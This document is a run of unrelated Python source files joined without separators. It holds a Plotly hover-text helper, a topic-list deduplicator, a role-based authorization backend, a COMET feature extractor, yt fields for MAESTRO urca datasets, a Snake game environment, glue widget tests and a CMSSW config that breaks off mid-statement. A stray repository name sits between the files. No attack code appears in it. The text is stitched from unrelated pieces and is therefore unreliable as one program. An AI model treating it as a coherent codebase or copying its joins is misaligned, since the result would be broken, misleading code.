grid[grid['key'].str.contains(category)].iterrows(): for i, val in enumerate(matchindex): if row['key']==template.format(column, category): textcol.append('Title:'+ str(row['value'][val])) if bubbletext: if row['key']==template.format(bubbletext, category): texttext.append('
    Summary:'+ str(row['value'][val])) if link: if row['key']==template.format(link, category): textlink.append('
    Link:'+ str(row['value'][val])) if size: if row['key']==template.format(size, category): textrelevance.append('
    Relevance:'+ str(row['value'][val])) for idx, val in enumerate(textcol): # Display the top 8 relevant entries plus the highlighted one (at most 9; see the break below) if idx==0: textall = "" else: textall ='
    ----------------------------------------
    ' textall = textall + textcol[idx] if bubbletext: textall = textall + texttext[idx] if link: textall = textall + textlink[idx] if size: textall = textall + textrelevance[idx] textoverall.append(textall) # Plotly only able to handle only upto 9 datapoints in hovertext # TODO ensure that the closest point being hovered is always included if idx==8 : break return "".join(textoverall) # The size is used to categorize in High (top 10% percentile), Medium ( to 50% ) and Rest as Low def return_transformed_size(size, comparewith): if size > np.percentile(comparewith, 90): return size*1.25 elif size > np.percentile(comparewith, 50): return size else : return size/1.25 def get_trace(grid, col_name_template, x_column, y_column,xy_column, bubble_column, bubble_text, bubble_link,size_column=None, sizeref=1, scale_bubble=10, marker_opacity=None, marker_border_width=None, color_column=None, colorscale=None, show_colorbar=True, colorbar_title=None, mode=None, category=None, xsize=100, ysize=100, xy_scale=1, xshift=0, yshift=0): ''' Makes the trace for the data as a dictionary object that can be added to the figure or time frames.''' try: if mode =='randommode': trace = { 'x': [return_xbin_cords(x, xsize) for x in grid.loc[grid['key']==col_name_template.format(x_column, category), 'value'].values[0]], 'y': [return_ybin_cords(y, ysize) for y in grid.loc[grid['key']==col_name_template.format(y_column, category), 'value'].values[0]], 'text': [i + '
    Summary:' + j + '
    Link:' + k for i, j, k in zip(grid.loc[grid['key']==col_name_template.format(bubble_column, category), 'value'].values[0], grid.loc[grid['key']==col_name_template.format(bubble_text, category), 'value'].values[0],grid.loc[grid['key']==col_name_template.format(bubble_link, category), 'value'].values[0])], 'hovertemplate': 'Title:%{text}', 'mode': 'markers' } else: trace = { 'x': [return_xy_cords_nlp(x,xy, xsize, 'x', xy_scale, xshift) for x, xy in zip(grid.loc[grid['key']==col_name_template.format(x_column, category), 'value'].values[0],grid.loc[grid['key']==col_name_template.format(xy_column, category), 'value'].values[0])], 'y': [return_xy_cords_nlp(y,xy, ysize, 'y', xy_scale, yshift) for y, xy in zip(grid.loc[grid['key']==col_name_template.format(y_column, category), 'value'].values[0],grid.loc[grid['key']==col_name_template.format(xy_column, category), 'value'].values[0])], 'text': [return_text_by_category_in_bin(grid,category,x,y,col_name_template,x_column,y_column,bubble_column,bubble_text,bubble_link,size_column) for x, y in zip(grid.loc[grid['key']==col_name_template.format(x_column,category), 'value'].values[0],grid.loc[grid['key']==col_name_template.format(y_column, category), 'value'].values[0])], 'hovertemplate': '%{text}', 'mode': 'markers' } if size_column: trace['marker'] = { 'sizemode': 'diameter', 'sizeref': sizeref, 'size': [return_transformed_size(size, grid.loc[grid['key']==col_name_template.format(size_column, category), 'value'].values[0]) for size in grid.loc[grid['key']==col_name_template.format(size_column, category), 'value'].values[0]], } else: trace['marker'] = { 'size': 10*scale_bubble, } if marker_opacity: trace['marker']['opacity'] = marker_opacity if marker_border_width: trace['marker']['line'] = {'width': marker_border_width} if color_column: trace['marker']['color'] = grid.loc[grid['key']==col_name_template.format(color_column), 'value'].values[0] trace['marker']['colorbar'] = {'title': colorbar_title} trace['marker']['colorscale'] = colorscale if category: trace['name'] = category except: trace = { 'x': [], 'y': [], } return trace #!/usr/bin/env python f_path = "./" f_name_topics = "record_topics.txt" # Read topic_list file #------------------------# topic_list_original = [] with open( (f_path+f_name_topics),'r') as _f: for _s in _f: # Remove the space and '\n' _s1 = _s.rstrip().lstrip() # Deal with coments _idx_comment = _s1.find('#') if _idx_comment >= 0: # Do find a '#' _s1 = _s1[:_idx_comment].rstrip() # Remove the comment parts if len(_s1) > 0: # Append non-empty string (after stripping) topic_list_original.append(_s1) # # # Get unique items (remove duplicated items) and sort topic_list = sorted(set(topic_list_original)) # print(type(topic_list)) #------------------------# # Count for duplicated elements num_duplicated_topic = len(topic_list_original) - len(topic_list) if num_duplicated_topic > 0: # Let's check which topics are duplicated __unique_topic_list = list() duplicated_topic_list = list() for _tp in topic_list_original: if not _tp in __unique_topic_list: __unique_topic_list.append(_tp) else: duplicated_topic_list.append(_tp) del __unique_topic_list duplicated_topic_list = sorted(set(duplicated_topic_list)) # Print the params # print("param_dict = %s" % str(param_dict)) print("\n\ntopic_list:\n---------------" ) for _tp in topic_list: print(_tp) print("---------------\nNote: Removed %d duplicated topics." 
% num_duplicated_topic) if num_duplicated_topic > 0: print("\nDuplicated topics:\n---------------") for _tp in duplicated_topic_list: print(_tp) print("---------------\n\n" ) #---------------------# topic_str = " ".join(topic_list) print("---") print(topic_str) print("---") with open( (f_path+f_name_topics[:-4] + "_str.txt"),'w') as _f: _f.write(topic_str) from .base import AuthorizationBackend # A permission is defined as the role of an account. # # The optional ordering defines a relation between roles; this allows specifying e.g. "admin" as required permission # and assuming that it also has "regular" and "viewonly" permissions, without explicitly requiring them. class RoleBackend(AuthorizationBackend): def __init__(self, role_field, order=None, **kwargs): self.role_field = role_field self.order = order or [] # lower first, e.g. ["readonly", "regular", "admin"] super().__init__(**kwargs) def get_role(self, account): return getattr(account, self.role_field) def get_actual_permissions(self, account, method, path): role = self.get_role(account) actual_permissions = {role} try: index = self.order.index(role) except ValueError: index = 0 actual_permissions.update(self.order[:index]) return actual_permissions from tqdm import tqdm from nltk import tokenize import numpy as np import pickle, torch import comet.src.data.data as data import comet.src.data.config as cfg import comet.src.models.utils as model_utils import comet.src.interactive.functions as interactive class CSKFeatureExtractor(): def __init__(self): super(CSKFeatureExtractor, self).__init__() device = 0 model_file = 'comet/pretrained_models/atomic_pretrained_model.pickle' sampling_algorithm = 'beam-5' category = 'all' opt, state_dict = interactive.load_model_file(model_file) data_loader, text_encoder = interactive.load_data("atomic", opt) self.opt = opt self.data_loader = data_loader self.text_encoder = text_encoder n_ctx = data_loader.max_event + data_loader.max_effect n_vocab = len(text_encoder.encoder) + n_ctx self.model = interactive.make_model(opt, n_vocab, n_ctx, state_dict) self.model.eval() if device != 'cpu': cfg.device = int(device) cfg.do_gpu = True torch.cuda.set_device(cfg.device) self.model.cuda(cfg.device) else: cfg.device = "cpu" def set_atomic_inputs(self, input_event, category, data_loader, text_encoder): XMB = torch.zeros(1, data_loader.max_event + 1).long().to(cfg.device) prefix, suffix = data.atomic_data.do_example(text_encoder, input_event, None, True, None) if len(prefix) > data_loader.max_event + 1: prefix = prefix[:data_loader.max_event + 1] XMB[:, :len(prefix)] = torch.LongTensor(prefix) XMB[:, -1] = torch.LongTensor([text_encoder.encoder["<{}>".format(category)]]) batch = {} batch["sequences"] = XMB batch["attention_mask"] = data.atomic_data.make_attention_mask(XMB) return batch def extract(self, sentence): atomic_keys = ['xIntent', 'xAttr', 'xNeed', 'xWant', 'xEffect', 'xReact', 'oWant', 'oEffect', 'oReact'] map1 = [{}, {}, {}, {}, {}, {}, {}, {}, {}] all_keys = list(sentence.keys()) for i in tqdm(range(len(all_keys))): item = all_keys[i] list1 = [[], [], [], [], [], [], [], [], []] for x in sentence[item]: input_event = x.encode('ascii', errors='ignore').decode("utf-8") m1 = [] for sent in tokenize.sent_tokenize(input_event): seqs = [] masks = [] for category in atomic_keys: batch = self.set_atomic_inputs(sent, category, self.data_loader, self.text_encoder) seqs.append(batch['sequences']) masks.append(batch['attention_mask']) XMB = torch.cat(seqs) MMB = torch.cat(masks) XMB = 
model_utils.prepare_position_embeddings(self.opt, self.data_loader.vocab_encoder, XMB.unsqueeze(-1)) h, _ = self.model(XMB.unsqueeze(1), sequence_mask=MMB) last_index = MMB[0][:-1].nonzero()[-1].cpu().numpy()[0] + 1 m1.append(h[:, -1, :].detach().cpu().numpy()) m1 = np.mean(np.array(m1), axis=0) for k, l1 in enumerate(list1): l1.append(m1[k]) for k, v1 in enumerate(map1): v1[item] = list1[k] return map1 """ Nodes that perform network related functions. """ # Import the base node msg_prefix = " %| 0.00|2020-10-22T20:58:17.862886+00:00| CelerNet |[ Simulator ]|00000000-0000-0000-000000000000|" try: from .fiber_terminal import FiberTerminal print(msg_prefix + "Loaded FiberTerminal node.") except ModuleNotFoundError as e: raise e """ Module for setting up some commonly used fields for MAESTRO urca datasets with yt. """ import yt import numpy as np class PhysicalConstants: N_AVO = 6.02214129e23 class DatasetHelpers: @staticmethod def get_field(ds, field_name): field = None field_short_name = None for f in ds.field_list + ds.derived_field_list: if f[1] == field_name: field_short_name = f[1] field = f return field, field_short_name if not field: print('Field {} not present.'.format(field_name)) return None, None class UrcaShellFields(object): def __init__(self): return def setup(self, ds): # ds should be a MAESTRO dataset in yt corresponding to the urca shell variables try: ds.add_field(('boxlib','urca23_shell_unscaled'), sampling_type='cell', units='', function=UrcaShellFields._urca23_shell_unscaled) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: urca23_shell_unscaled field could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','urca23_shell'), sampling_type='cell', units='', function=UrcaShellFields._urca23_shell) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: urca23_shell field could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','weak_xrate_na23'), sampling_type='cell', units='', function=UrcaShellFields._weak_xrate_na23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: weak_xrate_na23 field could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','weak_xrate_ne23'), sampling_type='cell', units='', function=UrcaShellFields._weak_xrate_ne23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: weak_xrate_ne23 field could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','reduced_x23'), sampling_type='cell', units='', function=UrcaShellFields._reduced_x23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: reduced_x23 could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucloss_epart_urca23'), sampling_type='cell', units='g', function=UrcaShellFields._enucloss_epart_urca23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucloss_epart_urca23 could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucdot_dqweak_urca23'), sampling_type='cell', units='g', function=UrcaShellFields._enucdot_dqweak_urca23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucdot_dqweak_urca23 could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucloss_sneut'), sampling_type='cell', units='g', function=UrcaShellFields._enucloss_sneut) except 
yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucloss_sneut could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucdot_ion_binding'), sampling_type='cell', units='g', function=UrcaShellFields._enucdot_ion_binding) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucdot_ion_binding could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucdot_summed_total'), sampling_type='cell', units='g', function=UrcaShellFields._enucdot_summed_total) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucdot_summed_total could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucdot_total'), sampling_type='cell', units='erg/s', function=UrcaShellFields._enucdot_total) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucdot_total could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','sum_omegadots'), sampling_type='cell', units='1/s', function=UrcaShellFields._sum_omegadots) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: sum_omegadots could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','sum_omegadot_urca23'), sampling_type='cell', units='1/s', function=UrcaShellFields._sum_omegadot_urca23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: sum_omegadot_urca23 could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','xc12_complement'), sampling_type='cell', units='', function=UrcaShellFields._xc12_complement) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: xc12_complement could not be added because it relies on a field not in the dataset.') pass @staticmethod def _urca23_shell_unscaled(field, data): return data['boxlib','ecap23']*data['boxlib','beta23']*data['boxlib','X(na23)']*data['boxlib','X(ne23)'] @staticmethod def _urca23_shell(field, data): return data['boxlib','urca23_shell_unscaled']/np.amax(data['boxlib','urca23_shell_unscaled']) @staticmethod def _weak_xrate_na23(field, data): return data['boxlib','beta23']*data['boxlib','X(ne23)'] - data['boxlib', 'X(na23)']*data['boxlib','ecap23'] @staticmethod def _weak_xrate_ne23(field, data): return data['boxlib', 'X(na23)']*data['boxlib','ecap23'] - data['boxlib','beta23']*data['boxlib','X(ne23)'] @staticmethod def _reduced_x23(field, data): return data['boxlib','X(na23)']*data['boxlib', 'X(ne23)']/(data['boxlib','X(na23)']+data['boxlib', 'X(ne23)']) @staticmethod def _enucloss_epart_urca23(field, data): return (-data['boxlib', 'epart_ecap23'] - data['boxlib', 'epart_beta23']) * data['boxlib', 'density'] * data['boxlib', 'cell_volume'] @staticmethod def _enucloss_sneut(field, data): # Energy loss rate due to plasma and other neutrino losses (not Urca) in erg/g/s * g/cm^3 * cm^3 = erg/s return data['boxlib', 'sneut'] * data['boxlib', 'density'] * data['boxlib', 'cell_volume'] @staticmethod def _enucdot_ion_binding(field, data): # Energy generation rate due to ion binding energies (does not include dQ corrections for Urca reactions) in erg/g/s * g/cm^3 * cm^3 = erg/s return data['boxlib', 'ionenuc'] * data['boxlib', 'density'] * data['boxlib', 'cell_volume'] @staticmethod def _enucdot_dqweak_urca23(field, data): return (data['boxlib', 'dqweak_ecap23'] + data['boxlib', 'dqweak_beta23']) * data['boxlib', 'density'] * data['boxlib', 'cell_volume'] @staticmethod def 
_enucdot_summed_total(field, data): return (data['boxlib', 'enucdot_ion_binding'] - data['boxlib', 'enucloss_sneut'] - data['boxlib', 'enucloss_epart_urca23'] + data['boxlib', 'enucdot_dqweak_urca23']) @staticmethod def _enucdot_total(field, data): return data['boxlib', 'enucdot'] * data['boxlib', 'density'] * data['boxlib', 'cell_volume'].in_units('cm**3') @staticmethod def _sum_omegadots(field, data): return np.sum(data['microphysics', 'omegadots'], axis=0) @staticmethod def _sum_omegadot_urca23(field, data): return data['boxlib', 'omegadot(ne23)'] + data['boxlib', 'omegadot(na23)'] @staticmethod def _xc12_complement(field, data): return 0.5 - data['boxlib', 'X(c12)'] """ Return the first non-repeating character in a string Input: ABCACDBEFD Output: E """ str01="ABCACDBEFD" for i in str01: if str01.count(i)==1: print(i) break # def not_repeat(str01): # for i in str01: # if str01.count(i) == 1: # return i # # res=not_repeat("ABCACDBEFD") # print(res) from overrides import overrides from allennlp.common.util import JsonDict from allennlp.data import DatasetReader, Instance from allennlp.data.tokenizers import WordTokenizer from allennlp.models import Model from allennlp.service.predictors.predictor import Predictor @Predictor.register('crf-tagger') class CrfTaggerPredictor(Predictor): """ Wrapper for the :class:`~allennlp.models.crf_tagger.CrfTagger` model. """ def __init__(self, model: Model, dataset_reader: DatasetReader) -> None: super().__init__(model, dataset_reader) self._tokenizer = WordTokenizer() @overrides def _json_to_instance(self, json: JsonDict) -> Instance: """ Expects JSON that looks like ``{"sentence": "..."}`` and returns JSON that looks like ``{"tags": [...], "class_probabilities": [[...], ..., [...]]}`` """ sentence = json["sentence"] tokens = self._tokenizer.tokenize(sentence) return self._dataset_reader.text_to_instance(tokens) import random import pygame import utils class SnakeEnv: def __init__(self, snake_head_x, snake_head_y, food_x, food_y): self.game = Snake(snake_head_x, snake_head_y, food_x, food_y) self.render = False def get_actions(self): return self.game.get_actions() def reset(self): return self.game.reset() def get_points(self): return self.game.get_points() def get_environment(self): return self.game.get_environment() def step(self, action): environment, points, dead = self.game.step(action) if self.render: self.draw(environment, points, dead) return environment, points, dead def draw(self, environment, points, dead): snake_head_x, snake_head_y, snake_body, food_x, food_y = environment self.display.fill(utils.BLUE) pygame.draw.rect( self.display, utils.BLACK, [ utils.GRID_SIZE, utils.GRID_SIZE, utils.DISPLAY_SIZE - utils.GRID_SIZE * 2, utils.DISPLAY_SIZE - utils.GRID_SIZE * 2 ]) # Draw snake head pygame.draw.rect( self.display, utils.GREEN, [ snake_head_x, snake_head_y, utils.GRID_SIZE, utils.GRID_SIZE ], 3 ) # Draw snake body for seg in snake_body: pygame.draw.rect( self.display, utils.GREEN, [ seg[0], seg[1], utils.GRID_SIZE, utils.GRID_SIZE, ], 1 ) # Draw food pygame.draw.rect( self.display, utils.RED, [ food_x, food_y, utils.GRID_SIZE, utils.GRID_SIZE ] ) text_surface = self.font.render("Points: " + str(points), True, utils.BLACK) text_rect = text_surface.get_rect() text_rect.center = ((280),(25)) self.display.blit(text_surface, text_rect) pygame.display.flip() if dead: # slow clock if dead self.clock.tick(1) else: self.clock.tick(5) return def display(self): pygame.init() pygame.display.set_caption('MP4: Snake') self.clock = pygame.time.Clock() pygame.font.init() self.font =
pygame.font.Font(pygame.font.get_default_font(), 15) self.display = pygame.display.set_mode((utils.DISPLAY_SIZE, utils.DISPLAY_SIZE), pygame.HWSURFACE) self.draw(self.game.get_environment(), self.game.get_points(), False) self.render = True class Snake: def __init__(self, snake_head_x, snake_head_y, food_x, food_y): self.init_snake_head_x = snake_head_x self.init_snake_head_y = snake_head_y self.init_food_x = food_x self.init_food_y = food_y # This quantity mentioned in the spec, 8*12*12 self.starve_steps = 8*(utils.DISPLAY_SIZE//utils.GRID_SIZE)**2 self.reset() def reset(self): self.points = 0 self.steps = 0 self.snake_head_x = self.init_snake_head_x self.snake_head_y = self.init_snake_head_y self.snake_body = [] self.food_x = self.init_food_x self.food_y = self.init_food_y def get_points(self): # These points only updated when food eaten return self.points def get_actions(self): # Corresponds to up, down, left, right # return [0, 1, 2, 3] return utils.UP, utils.DOWN, utils.LEFT, utils.RIGHT def get_environment(self): return [ self.snake_head_x, self.snake_head_y, self.snake_body, self.food_x, self.food_y ] def step(self, action): is_dead = self.move(action) return self.get_environment(), self.get_points(), is_dead def move(self, action): self.steps += 1 delta_x = delta_y = 0 # Up if action == utils.UP: delta_y = -1 * utils.GRID_SIZE # Down elif action == utils.DOWN: delta_y = utils.GRID_SIZE # Left elif action == utils.LEFT: delta_x = -1 * utils.GRID_SIZE # Right elif action == utils.RIGHT: delta_x = utils.GRID_SIZE old_body_head = None if len(self.snake_body) == 1: old_body_head = self.snake_body[0] # Snake "moves" by 1. adding previous head location to body, self.snake_body.append((self.snake_head_x, self.snake_head_y)) # 2. updating new head location via delta_x/y self.snake_head_x += delta_x self.snake_head_y += delta_y # 3. 
removing tail if body size greater than food eaten (points) if len(self.snake_body) > self.points: del(self.snake_body[0]) # Eats food, updates points, and randomly generates new food, if appropriate self.handle_eatfood() # Colliding with the snake body or going backwards while its body length # greater than 1 if len(self.snake_body) >= 1: for seg in self.snake_body: if self.snake_head_x == seg[0] and self.snake_head_y == seg[1]: return True # Moving towards body direction, not allowing snake to go backwards while # its body length is 1 if len(self.snake_body) == 1: if old_body_head == (self.snake_head_x, self.snake_head_y): return True # Check if collide with the wall (left, top, right, bottom) # Again, views grid position wrt top left corner of square if (self.snake_head_x < utils.GRID_SIZE or self.snake_head_y < utils.GRID_SIZE or self.snake_head_x + utils.GRID_SIZE > utils.DISPLAY_SIZE-utils.GRID_SIZE or self.snake_head_y + utils.GRID_SIZE > utils.DISPLAY_SIZE-utils.GRID_SIZE): return True # looping for too long and starved if self.steps > self.starve_steps: return True return False def handle_eatfood(self): if (self.snake_head_x == self.food_x) and (self.snake_head_y == self.food_y): self.random_food() self.points += 1 self.steps = 0 def random_food(self): # Math looks at upper left corner wrt DISPLAY_SIZE for grid coordinates max_x = utils.DISPLAY_SIZE - utils.WALL_SIZE - utils.GRID_SIZE max_y = utils.DISPLAY_SIZE - utils.WALL_SIZE - utils.GRID_SIZE self.food_x = random.randint(utils.WALL_SIZE, max_x) // utils.GRID_SIZE * utils.GRID_SIZE self.food_y = random.randint(utils.WALL_SIZE, max_y) // utils.GRID_SIZE * utils.GRID_SIZE # Keeps generating new food locations if it lands on the snake while self.check_food_on_snake(): self.food_x = random.randint(utils.WALL_SIZE, max_x) // utils.GRID_SIZE * utils.GRID_SIZE self.food_y = random.randint(utils.WALL_SIZE, max_y) // utils.GRID_SIZE * utils.GRID_SIZE def check_food_on_snake(self): if self.food_x == self.snake_head_x and self.food_y == self.snake_head_y: return True for seg in self.snake_body: if self.food_x == seg[0] and self.food_y == seg[1]: return True return False from __future__ import absolute_import, division, print_function import pytest from mock import MagicMock from glue.core import Data, DataCollection from glue.core.component_id import ComponentID from qtpy import QtWidgets from glue.utils.qt import combo_as_string from ..data_combo_helper import (ComponentIDComboHelper, ManualDataComboHelper, DataCollectionComboHelper) def test_component_id_combo_helper(): combo = QtWidgets.QComboBox() dc = DataCollection([]) helper = ComponentIDComboHelper(combo, dc) assert combo_as_string(combo) == "" data1 = Data(x=[1, 2, 3], y=[2, 3, 4], label='data1') dc.append(data1) helper.append_data(data1) assert combo_as_string(combo) == "x:y" data2 = Data(a=[1, 2, 3], b=['a', 'b', 'c'], label='data2') dc.append(data2) helper.append_data(data2) assert combo_as_string(combo) == "data1:x:y:data2:a:b" helper.categorical = False assert combo_as_string(combo) == "data1:x:y:data2:a" helper.numeric = False assert combo_as_string(combo) == "data1:data2" helper.categorical = True helper.numeric = True helper.visible = False assert combo_as_string(combo) == "data1:x:Pixel Axis 0 [x]:World 0:y:data2:a:Pixel Axis 0 [x]:World 0:b" helper.visible = True dc.remove(data2) assert combo_as_string(combo) == "x:y" # TODO: check that renaming a component updates the combo # data1.id['x'].label = 'z' # assert combo_as_string(combo) == "z:y" helper.remove_data(data1) 
assert combo_as_string(combo) == "" def test_component_id_combo_helper_nocollection(): # Make sure that we can use use ComponentIDComboHelper without any # data collection. combo = QtWidgets.QComboBox() data = Data(x=[1, 2, 3], y=[2, 3, 4], z=['a','b','c'], label='data1') helper = ComponentIDComboHelper(combo, data=data) assert combo_as_string(combo) == "x:y:z" helper.categorical = False assert combo_as_string(combo) == "x:y" helper.numeric = False assert combo_as_string(combo) == "" helper.categorical = True assert combo_as_string(combo) == "z" helper.numeric = True assert combo_as_string(combo) == "x:y:z" data2 = Data(a=[1, 2, 3], b=['a', 'b', 'c'], label='data2') with pytest.raises(Exception) as exc: helper.append_data(data2) assert exc.value.args[0] == ("Cannot change data in ComponentIDComboHelper " "initialized from a single dataset") with pytest.raises(Exception) as exc: helper.remove_data(data2) assert exc.value.args[0] == ("Cannot change data in ComponentIDComboHelper " "initialized from a single dataset") with pytest.raises(Exception) as exc: helper.set_multiple_data([data2]) assert exc.value.args[0] == ("Cannot change data in ComponentIDComboHelper " "initialized from a single dataset") def test_component_id_combo_helper_init(): # Regression test to make sure that the numeric and categorical options # in the __init__ are taken into account properly combo = QtWidgets.QComboBox() dc = DataCollection([]) data = Data(a=[1,2,3], b=['a','b','c'], label='data2') dc.append(data) helper = ComponentIDComboHelper(combo, dc) helper.append_data(data) assert combo_as_string(combo) == "a:b" helper = ComponentIDComboHelper(combo, dc, numeric=False) helper.append_data(data) assert combo_as_string(combo) == "b" helper = ComponentIDComboHelper(combo, dc, categorical=False) helper.append_data(data) assert combo_as_string(combo) == "a" helper = ComponentIDComboHelper(combo, dc, numeric=False, categorical=False) helper.append_data(data) assert combo_as_string(combo) == "" def test_component_id_combo_helper_replaced(): # Make sure that when components are replaced, the equivalent combo index # remains selected and an event is broadcast so that any attached callback # properties can be sure to pull the latest text/userData. 
callback = MagicMock() combo = QtWidgets.QComboBox() combo.currentIndexChanged.connect(callback) dc = DataCollection([]) helper = ComponentIDComboHelper(combo, dc) assert combo_as_string(combo) == "" data1 = Data(x=[1, 2, 3], y=[2, 3, 4], label='data1') callback.reset_mock() dc.append(data1) helper.append_data(data1) callback.assert_called_once_with(0) callback.reset_mock() assert combo_as_string(combo) == "x:y" new_id = ComponentID(label='new') data1.update_id(data1.id['x'], new_id) callback.assert_called_once_with(0) callback.reset_mock() assert combo_as_string(combo) == "new:y" def test_manual_data_combo_helper(): combo = QtWidgets.QComboBox() dc = DataCollection([]) helper = ManualDataComboHelper(combo, dc) data1 = Data(x=[1,2,3], y=[2,3,4], label='data1') dc.append(data1) assert combo_as_string(combo) == "" helper.append_data(data1) assert combo_as_string(combo) == "data1" data1.label = 'mydata1' assert combo_as_string(combo) == "mydata1" dc.remove(data1) assert combo_as_string(combo) == "" def test_data_collection_combo_helper(): combo = QtWidgets.QComboBox() dc = DataCollection([]) helper = DataCollectionComboHelper(combo, dc) data1 = Data(x=[1,2,3], y=[2,3,4], label='data1') dc.append(data1) assert combo_as_string(combo) == "data1" data1.label = 'mydata1' assert combo_as_string(combo) == "mydata1" dc.remove(data1) assert combo_as_string(combo) == "" ckamtsikis/cmssw import FWCore.ParameterSet.Config as cms import FWCore.ParameterSet.VarParsing as VarParsing process = cms.Process("OccupancyPlotsTest") #prepare options options = VarParsing.VarParsing("analysis") options.register ('globalTag', "DONOTEXIST", VarParsing.VarParsing.multiplicity.singleton, # singleton or list VarParsing.VarParsing.varType.string, # string, int, or float "GlobalTag") options.register ('HLTprocess', "HLT", VarParsing.VarParsing.multiplicity.singleton, # singleton or list VarParsing.VarParsing.varType.string, # string, int, or float "HLTProcess") options.register ('triggerPath', "HLT_*", VarParsing.VarParsing.multiplicity.singleton, # singleton or list VarParsing.VarParsing.varType.string, # string, int, or float "list of HLT paths") options.parseArguments() # process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True), fileMode = cms.untracked.string("FULLMERGE") ) process.load("FWCore.MessageService.MessageLogger_cfi") process.MessageLogger.cout.enable = True process.MessageLogger.cout.threshold = cms.untracked.string("INFO") process.MessageLogger.debugModules = cms.untracked.vstring("*") process.MessageLogger.cout.default = cms.untracked.PSet( limit = cms.untracked.int32(0) ) process.MessageLogger.files = dict( detids = cms.untracked.PSet( default = cms.untracked.PSet( limit = cms.untracked.int32(0) ), BuildingTrackerDetId = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), GeometricDetBuilding = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), SubDetectorGeometricDetType = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), BuildingGeomDetUnits = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), LookingForFirstStrip = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), BuildingSubDetTypeMap = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), SubDetTypeMapContent = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), NumberOfLayers = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), IsThereTest = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), threshold = cms.untracked.string("DEBUG") ) 
) process.MessageLogger.cout.DuplicateHitFinder = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ) process.MessageLogger.cout.FwkSummary = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ) process.MessageLogger.cout.FwkReport = cms.untracked.PSet( reportEvery = cms.untracked.int32(10000) ) process.MessageLogger.cerr.threshold = cms.untracked.string("WARNING") process.MessageLogger.cerr.default = cms.untracked.PSet( limit = cms.untracked.int32(10000000) ) process.MessageLogger.cerr.FwkReport = cms.untracked.PSet( reportEvery = cms.untracked.int32(100000) ) #------------------------------------------------------------------ process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(options.maxEvents) ) process.source = cms.Source("PoolSource", fileNames = cms.untracked.vstring(options.inputFiles), # skipBadFiles = cms.untracked.bool(True), inputCommands = cms.untracked.vstring("keep *", "drop *_MEtoEDMConverter_*_*") ) # HLT Selection ------------------------------------------------------------ process.load("HLTrigger.HLTfilters.triggerResultsFilter_cfi") process.triggerResultsFilter.triggerConditions = cms.vstring(options.triggerPath) process.triggerResultsFilter.hltResults = cms.InputTag( "TriggerResults", "", options.HLTprocess ) process.triggerResultsFilter.l1tResults = cms.InputTag( "" ) process.triggerResultsFilter.throw = cms.bool(False) process.seqHLTSelection = cms.Sequence(process.triggerResultsFilter) if options.triggerPath=="*": process.seqHLTSelection = cms.Sequence() #-------------------------------------- #from DPGAnalysis.SiStripTools.occupancyplotsselections_cff import * #from DPGAnalysis.SiStripTools.occupancyplotsselections_simplified_cff import * from DPGAnalysis.SiStripTools.occupancyplotsselections_phase2_cff import * #process.ssclusmultprod = cms.EDProducer("SiStripClusterMultiplicityProducer", # clusterdigiCollection = cms.InputTag("siStripClusters"), # wantedSubDets = cms.VPSet() # ) #process.ssclusmultprod.wantedSubDets.extend(OccupancyPlotsStripWantedSubDets) # #process.ssclusoccuprod = cms.EDProducer("SiStripClusterMultiplicityProducer", # clusterdigiCollection = cms.InputTag("siStripClusters"), # withClusterSize = cms.untracked.bool(True), # wantedSubDets = cms.VPSet() # ) #process.ssclusoccuprod.wantedSubDets.extend(OccupancyPlotsStripWantedSubDets) process.spclusmultprod = cms.EDProducer("SiPixelClusterMultiplicityProducer", clusterdigiCollection = cms.InputTag("siPixelClusters"), wantedSubDets = cms.VPSet() ) process.spclusmultprod.wantedSubDets.extend(OccupancyPlotsPixelWantedSubDets) process.spclusmultprodontrack=process.spclusmultprod.clone(clusterdigiCollection = cms.InputTag("AlignmentTrackSelector")) process.spclusmultprodxy = process.spclusmultprod.clone() process.spclusmultprodxy.wantedSubDets = OccupancyPlotsFPIXmDetailedWantedSubDets process.spclusmultprodxy.wantedSubDets.extend(OccupancyPlotsFPIXpDetailedWantedSubDets) process.spclusmultprodxyontrack=process.spclusmultprodxy.clone(clusterdigiCollection = cms.InputTag("AlignmentTrackSelector")) process.spclusoccuprod = cms.EDProducer("SiPixelClusterMultiplicityProducer", clusterdigiCollection = 